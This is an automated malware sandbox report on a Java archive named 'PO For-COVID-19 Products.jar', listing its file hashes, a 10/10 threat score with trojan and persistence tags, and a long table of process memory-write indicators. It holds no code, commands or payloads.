8fa51db15722c9e5ae2ff0344cea3442c090a70f99ebf382e65e39ff1645e37d

Analysis

max time kernel
125s
max time network
143s
platform
windows7_x64
resource
win7
submitted
07/07/2020, 09:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO For-COVID-19 Products.jar
Size

402KB
MD5

1d5620ec8f5dc6de6d0c98c53efc9e5b
SHA1

08fff82996a4590474ad95c43cf0ffb1df604f87
SHA256

8fa51db15722c9e5ae2ff0344cea3442c090a70f99ebf382e65e39ff1645e37d
SHA512

0d9501cdbb7213c37f370b867247a1b969c575068a4c45d72efdf559eb73a7baca173cef7df9b198fa7b38f6b735a47437ef794a3dc1cf8d96bf4fbebe625622

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Suspicious use of WriteProcessMemory 759 IoCs

description	pid	Process	procid_target
PID 900 wrote to memory of 1628	900	java.exe	25
PID 900 wrote to memory of 1628	900	java.exe	25
PID 900 wrote to memory of 1628	900	java.exe	25
PID 900 wrote to memory of 804	900	java.exe	26
PID 900 wrote to memory of 804	900	java.exe	26
PID 900 wrote to memory of 804	900	java.exe	26
PID 804 wrote to memory of 764	804	cmd.exe	27
PID 804 wrote to memory of 764	804	cmd.exe	27
PID 804 wrote to memory of 764	804	cmd.exe	27
PID 900 wrote to memory of 1104	900	java.exe	28
PID 900 wrote to memory of 1104	900	java.exe	28
PID 900 wrote to memory of 1104	900	java.exe	28
PID 1104 wrote to memory of 1080	1104	cmd.exe	29
PID 1104 wrote to memory of 1080	1104	cmd.exe	29
PID 1104 wrote to memory of 1080	1104	cmd.exe	29
PID 900 wrote to memory of 1812	900	java.exe	30
PID 900 wrote to memory of 1812	900	java.exe	30
PID 900 wrote to memory of 1812	900	java.exe	30
PID 900 wrote to memory of 1820	900	java.exe	31
PID 900 wrote to memory of 1820	900	java.exe	31
PID 900 wrote to memory of 1820	900	java.exe	31
PID 900 wrote to memory of 1840	900	java.exe	32
PID 900 wrote to memory of 1840	900	java.exe	32
PID 900 wrote to memory of 1840	900	java.exe	32
PID 900 wrote to memory of 1264	900	java.exe	33
PID 900 wrote to memory of 1264	900	java.exe	33
PID 900 wrote to memory of 1264	900	java.exe	33
PID 900 wrote to memory of 1808	900	java.exe	34
PID 900 wrote to memory of 1808	900	java.exe	34
PID 900 wrote to memory of 1808	900	java.exe	34
PID 900 wrote to memory of 1856	900	java.exe	35
PID 900 wrote to memory of 1856	900	java.exe	35
PID 900 wrote to memory of 1856	900	java.exe	35
PID 900 wrote to memory of 1800	900	java.exe	36
PID 900 wrote to memory of 1800	900	java.exe	36
PID 900 wrote to memory of 1800	900	java.exe	36
PID 900 wrote to memory of 1872	900	java.exe	37
PID 900 wrote to memory of 1872	900	java.exe	37
PID 900 wrote to memory of 1872	900	java.exe	37
PID 900 wrote to memory of 1624	900	java.exe	38
PID 900 wrote to memory of 1624	900	java.exe	38
PID 900 wrote to memory of 1624	900	java.exe	38
PID 900 wrote to memory of 1664	900	java.exe	39
PID 900 wrote to memory of 1664	900	java.exe	39
PID 900 wrote to memory of 1664	900	java.exe	39
PID 900 wrote to memory of 1576	900	java.exe	40
PID 900 wrote to memory of 1576	900	java.exe	40
PID 900 wrote to memory of 1576	900	java.exe	40
PID 900 wrote to memory of 1924	900	java.exe	42
PID 900 wrote to memory of 1924	900	java.exe	42
PID 900 wrote to memory of 1924	900	java.exe	42
PID 900 wrote to memory of 1904	900	java.exe	43
PID 900 wrote to memory of 1904	900	java.exe	43
PID 900 wrote to memory of 1904	900	java.exe	43
PID 900 wrote to memory of 1952	900	java.exe	47
PID 900 wrote to memory of 1952	900	java.exe	47
PID 900 wrote to memory of 1952	900	java.exe	47
PID 900 wrote to memory of 1972	900	java.exe	48
PID 900 wrote to memory of 1972	900	java.exe	48
PID 900 wrote to memory of 1972	900	java.exe	48
PID 1624 wrote to memory of 300	1624	cmd.exe	49
PID 1624 wrote to memory of 300	1624	cmd.exe	49
PID 1624 wrote to memory of 300	1624	cmd.exe	49
PID 900 wrote to memory of 2004	900	java.exe	51
PID 900 wrote to memory of 2004	900	java.exe	51
PID 900 wrote to memory of 2004	900	java.exe	51
PID 900 wrote to memory of 1492	900	java.exe	53
PID 900 wrote to memory of 1492	900	java.exe	53
PID 900 wrote to memory of 1492	900	java.exe	53
PID 1624 wrote to memory of 524	1624	cmd.exe	55
PID 1624 wrote to memory of 524	1624	cmd.exe	55
PID 1624 wrote to memory of 524	1624	cmd.exe	55
PID 900 wrote to memory of 864	900	java.exe	57
PID 900 wrote to memory of 864	900	java.exe	57
PID 900 wrote to memory of 864	900	java.exe	57
PID 900 wrote to memory of 576	900	java.exe	58
PID 900 wrote to memory of 576	900	java.exe	58
PID 900 wrote to memory of 576	900	java.exe	58
PID 900 wrote to memory of 1296	900	java.exe	60
PID 900 wrote to memory of 1296	900	java.exe	60
PID 900 wrote to memory of 1296	900	java.exe	60
PID 900 wrote to memory of 1120	900	java.exe	63
PID 900 wrote to memory of 1120	900	java.exe	63
PID 900 wrote to memory of 1120	900	java.exe	63
PID 900 wrote to memory of 764	900	java.exe	64
PID 900 wrote to memory of 764	900	java.exe	64
PID 900 wrote to memory of 764	900	java.exe	64
PID 900 wrote to memory of 1516	900	java.exe	65
PID 900 wrote to memory of 1516	900	java.exe	65
PID 900 wrote to memory of 1516	900	java.exe	65
PID 900 wrote to memory of 1852	900	java.exe	66
PID 900 wrote to memory of 1852	900	java.exe	66
PID 900 wrote to memory of 1852	900	java.exe	66
PID 900 wrote to memory of 1368	900	java.exe	67
PID 900 wrote to memory of 1368	900	java.exe	67
PID 900 wrote to memory of 1368	900	java.exe	67
PID 900 wrote to memory of 1792	900	java.exe	69
PID 900 wrote to memory of 1792	900	java.exe	69
PID 900 wrote to memory of 1792	900	java.exe	69
PID 900 wrote to memory of 1788	900	java.exe	70
PID 900 wrote to memory of 1788	900	java.exe	70
PID 900 wrote to memory of 1788	900	java.exe	70
PID 900 wrote to memory of 1856	900	java.exe	72
PID 900 wrote to memory of 1856	900	java.exe	72
PID 900 wrote to memory of 1856	900	java.exe	72
PID 900 wrote to memory of 1932	900	java.exe	74
PID 900 wrote to memory of 1932	900	java.exe	74
PID 900 wrote to memory of 1932	900	java.exe	74
PID 900 wrote to memory of 1104	900	java.exe	75
PID 900 wrote to memory of 1104	900	java.exe	75
PID 900 wrote to memory of 1104	900	java.exe	75
PID 900 wrote to memory of 1956	900	java.exe	78
PID 900 wrote to memory of 1956	900	java.exe	78
PID 900 wrote to memory of 1956	900	java.exe	78
PID 900 wrote to memory of 1920	900	java.exe	79
PID 900 wrote to memory of 1920	900	java.exe	79
PID 900 wrote to memory of 1920	900	java.exe	79
PID 900 wrote to memory of 2040	900	java.exe	82
PID 900 wrote to memory of 2040	900	java.exe	82
PID 900 wrote to memory of 2040	900	java.exe	82
PID 1120 wrote to memory of 1764	1120	cmd.exe	89
PID 1120 wrote to memory of 1764	1120	cmd.exe	89
PID 1120 wrote to memory of 1764	1120	cmd.exe	89
PID 900 wrote to memory of 1644	900	java.exe	90
PID 900 wrote to memory of 1644	900	java.exe	90
PID 900 wrote to memory of 1644	900	java.exe	90
PID 900 wrote to memory of 1904	900	java.exe	92
PID 900 wrote to memory of 1904	900	java.exe	92
PID 900 wrote to memory of 1904	900	java.exe	92
PID 1120 wrote to memory of 1832	1120	cmd.exe	93
PID 1120 wrote to memory of 1832	1120	cmd.exe	93
PID 1120 wrote to memory of 1832	1120	cmd.exe	93
PID 1904 wrote to memory of 1972	1904	cmd.exe	94
PID 1904 wrote to memory of 1972	1904	cmd.exe	94
PID 1904 wrote to memory of 1972	1904	cmd.exe	94
PID 900 wrote to memory of 768	900	java.exe	95
PID 900 wrote to memory of 768	900	java.exe	95
PID 900 wrote to memory of 768	900	java.exe	95
PID 768 wrote to memory of 668	768	cmd.exe	96
PID 768 wrote to memory of 668	768	cmd.exe	96
PID 768 wrote to memory of 668	768	cmd.exe	96
PID 768 wrote to memory of 1648	768	cmd.exe	97
PID 768 wrote to memory of 1648	768	cmd.exe	97
PID 768 wrote to memory of 1648	768	cmd.exe	97
PID 900 wrote to memory of 1824	900	java.exe	98
PID 900 wrote to memory of 1824	900	java.exe	98
PID 900 wrote to memory of 1824	900	java.exe	98
PID 1824 wrote to memory of 1388	1824	cmd.exe	99
PID 1824 wrote to memory of 1388	1824	cmd.exe	99
PID 1824 wrote to memory of 1388	1824	cmd.exe	99
PID 1824 wrote to memory of 1788	1824	cmd.exe	100
PID 1824 wrote to memory of 1788	1824	cmd.exe	100
PID 1824 wrote to memory of 1788	1824	cmd.exe	100
PID 900 wrote to memory of 1856	900	java.exe	101
PID 900 wrote to memory of 1856	900	java.exe	101
PID 900 wrote to memory of 1856	900	java.exe	101
PID 1856 wrote to memory of 1628	1856	cmd.exe	102
PID 1856 wrote to memory of 1628	1856	cmd.exe	102
PID 1856 wrote to memory of 1628	1856	cmd.exe	102
PID 900 wrote to memory of 1572	900	java.exe	103
PID 900 wrote to memory of 1572	900	java.exe	103
PID 900 wrote to memory of 1572	900	java.exe	103
PID 1856 wrote to memory of 2028	1856	cmd.exe	105
PID 1856 wrote to memory of 2028	1856	cmd.exe	105
PID 1856 wrote to memory of 2028	1856	cmd.exe	105
PID 900 wrote to memory of 2040	900	java.exe	106
PID 900 wrote to memory of 2040	900	java.exe	106
PID 900 wrote to memory of 2040	900	java.exe	106
PID 2040 wrote to memory of 344	2040	cmd.exe	107
PID 2040 wrote to memory of 344	2040	cmd.exe	107
PID 2040 wrote to memory of 344	2040	cmd.exe	107
PID 2040 wrote to memory of 1560	2040	cmd.exe	108
PID 2040 wrote to memory of 1560	2040	cmd.exe	108
PID 2040 wrote to memory of 1560	2040	cmd.exe	108
PID 900 wrote to memory of 1528	900	java.exe	109
PID 900 wrote to memory of 1528	900	java.exe	109
PID 900 wrote to memory of 1528	900	java.exe	109
PID 1528 wrote to memory of 764	1528	cmd.exe	110
PID 1528 wrote to memory of 764	1528	cmd.exe	110
PID 1528 wrote to memory of 764	1528	cmd.exe	110
PID 1528 wrote to memory of 1900	1528	cmd.exe	111
PID 1528 wrote to memory of 1900	1528	cmd.exe	111
PID 1528 wrote to memory of 1900	1528	cmd.exe	111
PID 900 wrote to memory of 660	900	java.exe	112
PID 900 wrote to memory of 660	900	java.exe	112
PID 900 wrote to memory of 660	900	java.exe	112
PID 660 wrote to memory of 1784	660	cmd.exe	113
PID 660 wrote to memory of 1784	660	cmd.exe	113
PID 660 wrote to memory of 1784	660	cmd.exe	113
PID 660 wrote to memory of 780	660	cmd.exe	114
PID 660 wrote to memory of 780	660	cmd.exe	114
PID 660 wrote to memory of 780	660	cmd.exe	114
PID 900 wrote to memory of 1516	900	java.exe	115
PID 900 wrote to memory of 1516	900	java.exe	115
PID 900 wrote to memory of 1516	900	java.exe	115
PID 1516 wrote to memory of 2032	1516	cmd.exe	116
PID 1516 wrote to memory of 2032	1516	cmd.exe	116
PID 1516 wrote to memory of 2032	1516	cmd.exe	116
PID 1516 wrote to memory of 1940	1516	cmd.exe	117
PID 1516 wrote to memory of 1940	1516	cmd.exe	117
PID 1516 wrote to memory of 1940	1516	cmd.exe	117
PID 900 wrote to memory of 1696	900	java.exe	118
PID 900 wrote to memory of 1696	900	java.exe	118
PID 900 wrote to memory of 1696	900	java.exe	118
PID 1696 wrote to memory of 1664	1696	cmd.exe	119
PID 1696 wrote to memory of 1664	1696	cmd.exe	119
PID 1696 wrote to memory of 1664	1696	cmd.exe	119
PID 1696 wrote to memory of 1720	1696	cmd.exe	120
PID 1696 wrote to memory of 1720	1696	cmd.exe	120
PID 1696 wrote to memory of 1720	1696	cmd.exe	120
PID 900 wrote to memory of 1648	900	java.exe	121
PID 900 wrote to memory of 1648	900	java.exe	121
PID 900 wrote to memory of 1648	900	java.exe	121
PID 1648 wrote to memory of 1980	1648	cmd.exe	122
PID 1648 wrote to memory of 1980	1648	cmd.exe	122
PID 1648 wrote to memory of 1980	1648	cmd.exe	122
PID 1648 wrote to memory of 1960	1648	cmd.exe	123
PID 1648 wrote to memory of 1960	1648	cmd.exe	123
PID 1648 wrote to memory of 1960	1648	cmd.exe	123
PID 900 wrote to memory of 1892	900	java.exe	124
PID 900 wrote to memory of 1892	900	java.exe	124
PID 900 wrote to memory of 1892	900	java.exe	124
PID 900 wrote to memory of 544	900	java.exe	125
PID 900 wrote to memory of 544	900	java.exe	125
PID 900 wrote to memory of 544	900	java.exe	125
PID 544 wrote to memory of 1644	544	cmd.exe	127
PID 544 wrote to memory of 1644	544	cmd.exe	127
PID 544 wrote to memory of 1644	544	cmd.exe	127
PID 544 wrote to memory of 1312	544	cmd.exe	128
PID 544 wrote to memory of 1312	544	cmd.exe	128
PID 544 wrote to memory of 1312	544	cmd.exe	128
PID 900 wrote to memory of 2028	900	java.exe	129
PID 900 wrote to memory of 2028	900	java.exe	129
PID 900 wrote to memory of 2028	900	java.exe	129
PID 2028 wrote to memory of 892	2028	cmd.exe	130
PID 2028 wrote to memory of 892	2028	cmd.exe	130
PID 2028 wrote to memory of 892	2028	cmd.exe	130
PID 2028 wrote to memory of 1804	2028	cmd.exe	131
PID 2028 wrote to memory of 1804	2028	cmd.exe	131
PID 2028 wrote to memory of 1804	2028	cmd.exe	131
PID 900 wrote to memory of 1932	900	java.exe	132
PID 900 wrote to memory of 1932	900	java.exe	132
PID 900 wrote to memory of 1932	900	java.exe	132
PID 1932 wrote to memory of 1560	1932	cmd.exe	133
PID 1932 wrote to memory of 1560	1932	cmd.exe	133
PID 1932 wrote to memory of 1560	1932	cmd.exe	133
PID 1932 wrote to memory of 1032	1932	cmd.exe	134
PID 1932 wrote to memory of 1032	1932	cmd.exe	134
PID 1932 wrote to memory of 1032	1932	cmd.exe	134
PID 900 wrote to memory of 764	900	java.exe	135
PID 900 wrote to memory of 764	900	java.exe	135
PID 900 wrote to memory of 764	900	java.exe	135
PID 764 wrote to memory of 1704	764	cmd.exe	136
PID 764 wrote to memory of 1704	764	cmd.exe	136
PID 764 wrote to memory of 1704	764	cmd.exe	136
PID 764 wrote to memory of 1784	764	cmd.exe	137
PID 764 wrote to memory of 1784	764	cmd.exe	137
PID 764 wrote to memory of 1784	764	cmd.exe	137
PID 900 wrote to memory of 1532	900	java.exe	138
PID 900 wrote to memory of 1532	900	java.exe	138
PID 900 wrote to memory of 1532	900	java.exe	138
PID 1532 wrote to memory of 1496	1532	cmd.exe	139
PID 1532 wrote to memory of 1496	1532	cmd.exe	139
PID 1532 wrote to memory of 1496	1532	cmd.exe	139
PID 1532 wrote to memory of 332	1532	cmd.exe	140
PID 1532 wrote to memory of 332	1532	cmd.exe	140
PID 1532 wrote to memory of 332	1532	cmd.exe	140
PID 900 wrote to memory of 1572	900	java.exe	141
PID 900 wrote to memory of 1572	900	java.exe	141
PID 900 wrote to memory of 1572	900	java.exe	141
PID 1572 wrote to memory of 1480	1572	cmd.exe	142
PID 1572 wrote to memory of 1480	1572	cmd.exe	142
PID 1572 wrote to memory of 1480	1572	cmd.exe	142
PID 1572 wrote to memory of 1088	1572	cmd.exe	143
PID 1572 wrote to memory of 1088	1572	cmd.exe	143
PID 1572 wrote to memory of 1088	1572	cmd.exe	143
PID 900 wrote to memory of 1672	900	java.exe	144
PID 900 wrote to memory of 1672	900	java.exe	144
PID 900 wrote to memory of 1672	900	java.exe	144
PID 1672 wrote to memory of 1664	1672	cmd.exe	145
PID 1672 wrote to memory of 1664	1672	cmd.exe	145
PID 1672 wrote to memory of 1664	1672	cmd.exe	145
PID 1672 wrote to memory of 1104	1672	cmd.exe	146
PID 1672 wrote to memory of 1104	1672	cmd.exe	146
PID 1672 wrote to memory of 1104	1672	cmd.exe	146
PID 900 wrote to memory of 2024	900	java.exe	147
PID 900 wrote to memory of 2024	900	java.exe	147
PID 900 wrote to memory of 2024	900	java.exe	147
PID 2024 wrote to memory of 1492	2024	cmd.exe	148
PID 2024 wrote to memory of 1492	2024	cmd.exe	148
PID 2024 wrote to memory of 1492	2024	cmd.exe	148
PID 900 wrote to memory of 1564	900	java.exe	149
PID 900 wrote to memory of 1564	900	java.exe	149
PID 900 wrote to memory of 1564	900	java.exe	149
PID 2024 wrote to memory of 1524	2024	cmd.exe	151
PID 2024 wrote to memory of 1524	2024	cmd.exe	151
PID 2024 wrote to memory of 1524	2024	cmd.exe	151
PID 900 wrote to memory of 1828	900	java.exe	152
PID 900 wrote to memory of 1828	900	java.exe	152
PID 900 wrote to memory of 1828	900	java.exe	152
PID 1828 wrote to memory of 1796	1828	cmd.exe	153
PID 1828 wrote to memory of 1796	1828	cmd.exe	153
PID 1828 wrote to memory of 1796	1828	cmd.exe	153
PID 1828 wrote to memory of 888	1828	cmd.exe	154
PID 1828 wrote to memory of 888	1828	cmd.exe	154
PID 1828 wrote to memory of 888	1828	cmd.exe	154
PID 900 wrote to memory of 1116	900	java.exe	155
PID 900 wrote to memory of 1116	900	java.exe	155
PID 900 wrote to memory of 1116	900	java.exe	155
PID 1116 wrote to memory of 1168	1116	cmd.exe	156
PID 1116 wrote to memory of 1168	1116	cmd.exe	156
PID 1116 wrote to memory of 1168	1116	cmd.exe	156
PID 1116 wrote to memory of 344	1116	cmd.exe	157
PID 1116 wrote to memory of 344	1116	cmd.exe	157
PID 1116 wrote to memory of 344	1116	cmd.exe	157
PID 900 wrote to memory of 1056	900	java.exe	158
PID 900 wrote to memory of 1056	900	java.exe	158
PID 900 wrote to memory of 1056	900	java.exe	158
PID 1056 wrote to memory of 592	1056	cmd.exe	159
PID 1056 wrote to memory of 592	1056	cmd.exe	159
PID 1056 wrote to memory of 592	1056	cmd.exe	159
PID 1056 wrote to memory of 1296	1056	cmd.exe	160
PID 1056 wrote to memory of 1296	1056	cmd.exe	160
PID 1056 wrote to memory of 1296	1056	cmd.exe	160
PID 900 wrote to memory of 1100	900	java.exe	161
PID 900 wrote to memory of 1100	900	java.exe	161
PID 900 wrote to memory of 1100	900	java.exe	161
PID 1100 wrote to memory of 1852	1100	cmd.exe	162
PID 1100 wrote to memory of 1852	1100	cmd.exe	162
PID 1100 wrote to memory of 1852	1100	cmd.exe	162
PID 1100 wrote to memory of 1792	1100	cmd.exe	163
PID 1100 wrote to memory of 1792	1100	cmd.exe	163
PID 1100 wrote to memory of 1792	1100	cmd.exe	163
PID 900 wrote to memory of 1704	900	java.exe	164
PID 900 wrote to memory of 1704	900	java.exe	164
PID 900 wrote to memory of 1704	900	java.exe	164
PID 1704 wrote to memory of 776	1704	cmd.exe	165
PID 1704 wrote to memory of 776	1704	cmd.exe	165
PID 1704 wrote to memory of 776	1704	cmd.exe	165
PID 1704 wrote to memory of 1968	1704	cmd.exe	166
PID 1704 wrote to memory of 1968	1704	cmd.exe	166
PID 1704 wrote to memory of 1968	1704	cmd.exe	166
PID 900 wrote to memory of 332	900	java.exe	167
PID 900 wrote to memory of 332	900	java.exe	167
PID 900 wrote to memory of 332	900	java.exe	167
PID 332 wrote to memory of 1812	332	cmd.exe	168
PID 332 wrote to memory of 1812	332	cmd.exe	168
PID 332 wrote to memory of 1812	332	cmd.exe	168
PID 900 wrote to memory of 1940	900	java.exe	169
PID 900 wrote to memory of 1940	900	java.exe	169
PID 900 wrote to memory of 1940	900	java.exe	169
PID 332 wrote to memory of 1388	332	cmd.exe	171
PID 332 wrote to memory of 1388	332	cmd.exe	171
PID 332 wrote to memory of 1388	332	cmd.exe	171
PID 900 wrote to memory of 1816	900	java.exe	172
PID 900 wrote to memory of 1816	900	java.exe	172
PID 900 wrote to memory of 1816	900	java.exe	172
PID 1816 wrote to memory of 2044	1816	cmd.exe	173
PID 1816 wrote to memory of 2044	1816	cmd.exe	173
PID 1816 wrote to memory of 2044	1816	cmd.exe	173
PID 1816 wrote to memory of 612	1816	cmd.exe	174
PID 1816 wrote to memory of 612	1816	cmd.exe	174
PID 1816 wrote to memory of 612	1816	cmd.exe	174
PID 900 wrote to memory of 1504	900	java.exe	175
PID 900 wrote to memory of 1504	900	java.exe	175
PID 900 wrote to memory of 1504	900	java.exe	175
PID 1504 wrote to memory of 1992	1504	cmd.exe	176
PID 1504 wrote to memory of 1992	1504	cmd.exe	176
PID 1504 wrote to memory of 1992	1504	cmd.exe	176
PID 1504 wrote to memory of 2036	1504	cmd.exe	177
PID 1504 wrote to memory of 2036	1504	cmd.exe	177
PID 1504 wrote to memory of 2036	1504	cmd.exe	177
PID 900 wrote to memory of 1920	900	java.exe	178
PID 900 wrote to memory of 1920	900	java.exe	178
PID 900 wrote to memory of 1920	900	java.exe	178
PID 1920 wrote to memory of 284	1920	cmd.exe	179
PID 1920 wrote to memory of 284	1920	cmd.exe	179
PID 1920 wrote to memory of 284	1920	cmd.exe	179
PID 1920 wrote to memory of 1564	1920	cmd.exe	180
PID 1920 wrote to memory of 1564	1920	cmd.exe	180
PID 1920 wrote to memory of 1564	1920	cmd.exe	180
PID 900 wrote to memory of 1576	900	java.exe	181
PID 900 wrote to memory of 1576	900	java.exe	181
PID 900 wrote to memory of 1576	900	java.exe	181
PID 1576 wrote to memory of 888	1576	cmd.exe	182
PID 1576 wrote to memory of 888	1576	cmd.exe	182
PID 1576 wrote to memory of 888	1576	cmd.exe	182
PID 1576 wrote to memory of 1804	1576	cmd.exe	183
PID 1576 wrote to memory of 1804	1576	cmd.exe	183
PID 1576 wrote to memory of 1804	1576	cmd.exe	183
PID 900 wrote to memory of 1964	900	java.exe	184
PID 900 wrote to memory of 1964	900	java.exe	184
PID 900 wrote to memory of 1964	900	java.exe	184
PID 1964 wrote to memory of 1892	1964	cmd.exe	185
PID 1964 wrote to memory of 1892	1964	cmd.exe	185
PID 1964 wrote to memory of 1892	1964	cmd.exe	185
PID 1964 wrote to memory of 592	1964	cmd.exe	186
PID 1964 wrote to memory of 592	1964	cmd.exe	186
PID 1964 wrote to memory of 592	1964	cmd.exe	186
PID 900 wrote to memory of 1560	900	java.exe	187
PID 900 wrote to memory of 1560	900	java.exe	187
PID 900 wrote to memory of 1560	900	java.exe	187
PID 1560 wrote to memory of 780	1560	cmd.exe	188
PID 1560 wrote to memory of 780	1560	cmd.exe	188
PID 1560 wrote to memory of 780	1560	cmd.exe	188
PID 1560 wrote to memory of 1792	1560	cmd.exe	189
PID 1560 wrote to memory of 1792	1560	cmd.exe	189
PID 1560 wrote to memory of 1792	1560	cmd.exe	189
PID 900 wrote to memory of 1520	900	java.exe	190
PID 900 wrote to memory of 1520	900	java.exe	190
PID 900 wrote to memory of 1520	900	java.exe	190
PID 1520 wrote to memory of 1496	1520	cmd.exe	191
PID 1520 wrote to memory of 1496	1520	cmd.exe	191
PID 1520 wrote to memory of 1496	1520	cmd.exe	191
PID 1520 wrote to memory of 1076	1520	cmd.exe	192
PID 1520 wrote to memory of 1076	1520	cmd.exe	192
PID 1520 wrote to memory of 1076	1520	cmd.exe	192
PID 900 wrote to memory of 1636	900	java.exe	193
PID 900 wrote to memory of 1636	900	java.exe	193
PID 900 wrote to memory of 1636	900	java.exe	193
PID 1636 wrote to memory of 1388	1636	cmd.exe	194
PID 1636 wrote to memory of 1388	1636	cmd.exe	194
PID 1636 wrote to memory of 1388	1636	cmd.exe	194
PID 1636 wrote to memory of 1800	1636	cmd.exe	195
PID 1636 wrote to memory of 1800	1636	cmd.exe	195
PID 1636 wrote to memory of 1800	1636	cmd.exe	195
PID 900 wrote to memory of 2044	900	java.exe	196
PID 900 wrote to memory of 2044	900	java.exe	196
PID 900 wrote to memory of 2044	900	java.exe	196
PID 2044 wrote to memory of 1476	2044	cmd.exe	197
PID 2044 wrote to memory of 1476	2044	cmd.exe	197
PID 2044 wrote to memory of 1476	2044	cmd.exe	197
PID 2044 wrote to memory of 1088	2044	cmd.exe	198
PID 2044 wrote to memory of 1088	2044	cmd.exe	198
PID 2044 wrote to memory of 1088	2044	cmd.exe	198
PID 900 wrote to memory of 1720	900	java.exe	199
PID 900 wrote to memory of 1720	900	java.exe	199
PID 900 wrote to memory of 1720	900	java.exe	199
PID 1720 wrote to memory of 1940	1720	cmd.exe	200
PID 1720 wrote to memory of 1940	1720	cmd.exe	200
PID 1720 wrote to memory of 1940	1720	cmd.exe	200
PID 1720 wrote to memory of 1524	1720	cmd.exe	201
PID 1720 wrote to memory of 1524	1720	cmd.exe	201
PID 1720 wrote to memory of 1524	1720	cmd.exe	201
PID 900 wrote to memory of 1844	900	java.exe	202
PID 900 wrote to memory of 1844	900	java.exe	202
PID 900 wrote to memory of 1844	900	java.exe	202
PID 1844 wrote to memory of 1412	1844	cmd.exe	203
PID 1844 wrote to memory of 1412	1844	cmd.exe	203
PID 1844 wrote to memory of 1412	1844	cmd.exe	203
PID 1844 wrote to memory of 284	1844	cmd.exe	204
PID 1844 wrote to memory of 284	1844	cmd.exe	204
PID 1844 wrote to memory of 284	1844	cmd.exe	204
PID 900 wrote to memory of 1556	900	java.exe	205
PID 900 wrote to memory of 1556	900	java.exe	205
PID 900 wrote to memory of 1556	900	java.exe	205
PID 900 wrote to memory of 1168	900	java.exe	206
PID 900 wrote to memory of 1168	900	java.exe	206
PID 900 wrote to memory of 1168	900	java.exe	206
PID 1168 wrote to memory of 1924	1168	cmd.exe	208
PID 1168 wrote to memory of 1924	1168	cmd.exe	208
PID 1168 wrote to memory of 1924	1168	cmd.exe	208
PID 1168 wrote to memory of 592	1168	cmd.exe	209
PID 1168 wrote to memory of 592	1168	cmd.exe	209
PID 1168 wrote to memory of 592	1168	cmd.exe	209
PID 900 wrote to memory of 780	900	java.exe	210
PID 900 wrote to memory of 780	900	java.exe	210
PID 900 wrote to memory of 780	900	java.exe	210
PID 780 wrote to memory of 1968	780	cmd.exe	211
PID 780 wrote to memory of 1968	780	cmd.exe	211
PID 780 wrote to memory of 1968	780	cmd.exe	211
PID 780 wrote to memory of 1480	780	cmd.exe	212
PID 780 wrote to memory of 1480	780	cmd.exe	212
PID 780 wrote to memory of 1480	780	cmd.exe	212
PID 900 wrote to memory of 1936	900	java.exe	213
PID 900 wrote to memory of 1936	900	java.exe	213
PID 900 wrote to memory of 1936	900	java.exe	213
PID 1936 wrote to memory of 1972	1936	cmd.exe	214
PID 1936 wrote to memory of 1972	1936	cmd.exe	214
PID 1936 wrote to memory of 1972	1936	cmd.exe	214
PID 1936 wrote to memory of 612	1936	cmd.exe	215
PID 1936 wrote to memory of 612	1936	cmd.exe	215
PID 1936 wrote to memory of 612	1936	cmd.exe	215
PID 900 wrote to memory of 1476	900	java.exe	216
PID 900 wrote to memory of 1476	900	java.exe	216
PID 900 wrote to memory of 1476	900	java.exe	216
PID 1476 wrote to memory of 1960	1476	cmd.exe	217
PID 1476 wrote to memory of 1960	1476	cmd.exe	217
PID 1476 wrote to memory of 1960	1476	cmd.exe	217
PID 1476 wrote to memory of 1992	1476	cmd.exe	218
PID 1476 wrote to memory of 1992	1476	cmd.exe	218
PID 1476 wrote to memory of 1992	1476	cmd.exe	218
PID 900 wrote to memory of 1524	900	java.exe	219
PID 900 wrote to memory of 1524	900	java.exe	219
PID 900 wrote to memory of 1524	900	java.exe	219
PID 1524 wrote to memory of 1840	1524	cmd.exe	220
PID 1524 wrote to memory of 1840	1524	cmd.exe	220
PID 1524 wrote to memory of 1840	1524	cmd.exe	220
PID 1524 wrote to memory of 1976	1524	cmd.exe	221
PID 1524 wrote to memory of 1976	1524	cmd.exe	221
PID 1524 wrote to memory of 1976	1524	cmd.exe	221
PID 900 wrote to memory of 2004	900	java.exe	222
PID 900 wrote to memory of 2004	900	java.exe	222
PID 900 wrote to memory of 2004	900	java.exe	222
PID 2004 wrote to memory of 1064	2004	cmd.exe	223
PID 2004 wrote to memory of 1064	2004	cmd.exe	223
PID 2004 wrote to memory of 1064	2004	cmd.exe	223
PID 2004 wrote to memory of 1988	2004	cmd.exe	224
PID 2004 wrote to memory of 1988	2004	cmd.exe	224
PID 2004 wrote to memory of 1988	2004	cmd.exe	224
PID 900 wrote to memory of 1496	900	java.exe	225
PID 900 wrote to memory of 1496	900	java.exe	225
PID 900 wrote to memory of 1496	900	java.exe	225
PID 1496 wrote to memory of 760	1496	cmd.exe	226
PID 1496 wrote to memory of 760	1496	cmd.exe	226
PID 1496 wrote to memory of 760	1496	cmd.exe	226
PID 1496 wrote to memory of 1296	1496	cmd.exe	227
PID 1496 wrote to memory of 1296	1496	cmd.exe	227
PID 1496 wrote to memory of 1296	1496	cmd.exe	227
PID 900 wrote to memory of 1956	900	java.exe	228
PID 900 wrote to memory of 1956	900	java.exe	228
PID 900 wrote to memory of 1956	900	java.exe	228
PID 1956 wrote to memory of 1804	1956	cmd.exe	229
PID 1956 wrote to memory of 1804	1956	cmd.exe	229
PID 1956 wrote to memory of 1804	1956	cmd.exe	229
PID 1956 wrote to memory of 1480	1956	cmd.exe	230
PID 1956 wrote to memory of 1480	1956	cmd.exe	230
PID 1956 wrote to memory of 1480	1956	cmd.exe	230
PID 900 wrote to memory of 1800	900	java.exe	231
PID 900 wrote to memory of 1800	900	java.exe	231
PID 900 wrote to memory of 1800	900	java.exe	231
PID 1800 wrote to memory of 844	1800	cmd.exe	232
PID 1800 wrote to memory of 844	1800	cmd.exe	232
PID 1800 wrote to memory of 844	1800	cmd.exe	232
PID 1800 wrote to memory of 1492	1800	cmd.exe	233
PID 1800 wrote to memory of 1492	1800	cmd.exe	233
PID 1800 wrote to memory of 1492	1800	cmd.exe	233
PID 900 wrote to memory of 1960	900	java.exe	234
PID 900 wrote to memory of 1960	900	java.exe	234
PID 900 wrote to memory of 1960	900	java.exe	234
PID 1960 wrote to memory of 1680	1960	cmd.exe	235
PID 1960 wrote to memory of 1680	1960	cmd.exe	235
PID 1960 wrote to memory of 1680	1960	cmd.exe	235
PID 1960 wrote to memory of 892	1960	cmd.exe	236
